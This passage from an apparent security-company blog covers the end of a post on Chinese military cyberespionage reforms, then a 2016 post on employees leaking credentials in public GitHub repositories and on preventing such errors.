    This centralization of these type of operations, which were previously conducted by a diverse range of units, was likely intended to enable the PRC’s leadership to exercise greater control over these operations and thereby both increase effectiveness and reduce liabilities. In addition to a desire to improve capability, international pressure on the PRC to curtail its industrial cyberespionage operations, particularly from the US, has likely been a motivating factor for these reforms. If these measures are effective, they will likely make the SSF a much more effective tool for supporting the development and implementation of government policy and, crucially, engaging with opponents in the network domain of warfare.


    The early indications of the PRC’s new approach can already be seen in its engagement with regional opponents in the South China Sea. The PRC has become increasingly assertive in its territorial claims which is indicative of a desire to engage with these geostrategic issues not as a regional power, but as a “great power” on par with the US. This process is ongoing and while the effectiveness of the reforms remains to be seen, they give us an idea of what the PRC intends to become. We can, therefore, expect to see a decline in the volume of cyberespionage being conducted by Chinese actors, particularly corporate and industrial cyberespionage, as the shift of operational responsibility to the SSF reduces operational duplication, aligns operations more closely with centrally mandated objectives, cracks down on unsanctioned operations, and improves the focus of those operations which do take place.

    Do Not Invite Them In: What “Human Error” Can Mean In Practice Thu, 06 Oct 2016 10:08:45 +0000 Although you may or may not be a fan of vampire movies, you certainly know that vampires should not be invited into your house. One of the characters in the movie Lost Boys (1987) once said: “Don’t ever invite a vampire into your house, you silly boy. It renders you powerless.” A statement that well applies to the topic of this blog, i.e. that we should never be handing keys to cyber criminals; this can also render you powerless.

    So called “human errors” cause more data loss than malicious attacks, according to the UK’s Information Commissioner’s Office (ICO) and at Digital Shadows it is no secret that the largest threat to an organisation’s data is its own employees – whether deliberate or not. Back in February, a colleague published a blog that stated, “while smart cyber criminals hacking corporate systems get lots of publicity, the reality is cyber exposure incidents all too often have non-criminal, accidental causes.” The same was reiterated by the study “Managing Insider Risk Through Training & Culture” published by Experian Data Breach Resolution and the Ponemon Institute, which explained how more than half of the surveyed companies experienced security incidents due to malicious or negligent employees falling victim to cyberattacks or exposing information inadvertently.

    If “to err is human”, mistakes can also be easily corrected once aware of the risk. Let’s look into one type of incident often detected by our Searchlight platform here at Digital Shadows. By doing this you will receive an insight in what constitutes a common “human error” that could be affecting your organization one day: the easy access to codes and compromised credentials on the open web. All analysed instances contain compromised credentials made available on the public website github[.]com, a web-based Git repository hosting service providing access control and several collaboration features.

    For the purpose of this post, we collected data on the number of incidents that we have sourced from Github in the past six months and the result was quite revealing. Over 500 incidents included client information publicly available on Github. But that’s not all. Out of this total amount, we assessed the severity of seven incidents as “Very High” according to our in-house severity matrix, due to the public repositories being recently updated and containing identifiable client systems information and code—including a clear text username and password set. This shows a fairly worrying average of one serious incident detected every month. Although we can’t say for sure why this is happening, it does not appear to constitute an exception in what is becoming such a common – and unfortunate – scenario of login credentials being pushed to public repositories while rushing to get the work done. In this case, GitHub’s help page provides detailed instructions on how to avoid exposing sensitive data on the repository and how to remove them if already exposed.

    Keep in mind that prevention is better than a cure in such matters. Simple, well-executed preventive measures continue to be more important than complex systems. In fact, technological defences will not protect your computer if human nature does not care as much. As previously said, “to err is human” but “to persist is devilish.” Yet the blame cannot be pinned solely on the guilty individual. According to an Experian study, companies do understand the risk posed by careless or negligent employees that in turn could lead to a data leak or other security incidents. However, these same companies do not cultivate employee security awareness, leaving prevention largely forgotten. It appears that 60 percent of the respondents believes that employees are not knowledgeable or have no knowledge of the company’s security risks.

    Simply put, cybersecurity should be every employee’s concern. Here at Digital Shadows we don’t like to sit back